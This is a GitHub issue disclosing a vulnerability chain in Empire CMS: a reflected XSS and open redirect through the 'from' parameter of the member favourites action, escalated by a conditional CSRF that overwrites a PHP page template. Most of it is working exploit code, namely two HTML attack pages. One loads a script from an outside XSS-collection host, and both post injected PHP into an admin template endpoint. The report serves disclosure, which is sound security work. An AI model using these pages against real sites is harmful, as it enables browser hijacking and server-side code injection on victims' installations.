Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Empire CMS/URL jump&&reflection XSS&&condition csrf #3

Open
coolboy0816 opened this issue Apr 4, 2019 · 0 comments

Comments

Projects
None yet
1 participant
@coolboy0816
Copy link
Owner

commented Apr 4, 2019

From parameters for collecting articles
payload:
post: /e/member/doaction.php
enews=AddFava&id=1&cid=1&classid=35&from=javascript:alert233
image
Because of Empire CMS automatically jumps when the collection is successful, vulnerabilities are upgraded to remote JS code execution without interaction with users
Prove:
image
Loophole utilization:
Set jump to remote URL with attack payload,Using the script as follows:
attack.html

<html>
<head>
<script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<script type="text/javascript">
	$(document).ready(function(){
 htmlobj=$.ajax({type:"post",async:false,url:"http://localhost:8080/ecms75/e/member/doaction.php",dataType:"html",data:{"enews":"AddFava","id":"1","cid":"1","classid":"35","from":"http://localhost:8080/redirect.html"}});
		document.write(htmlobj.responseText);
	});
</script>
</head>
<body>
</body>
</html>

redirect.html

<html>
<head>
<script src=http://xss.tf/q1Y></script>
<script type="text/javascript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$.ajax({type:"post",url:"http://localhost:8080/ecms75/e/admin/template/EditDttemp.php",async:true,data:{"enews":"EditDtTempFiletext","tempid":"24","tempname":"重发注册激活邮件页面","temptext":"<?php phpinfo();?>"}});
});
</script>
<script>
window.location.replace("http://localhost:8080/ecms75/e/member/fava/");
</script>
</head>
</html>

Payload contains a conditional CSRF.When the background source authentication code is not opened in the background security mode, CSRF can be used to change the dynamic page template. Here, we choose to resend the registered activation mail page. The path is /e/template/member/regsend.php
The effect of the attack is as follows:
4cipo-d9o81

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.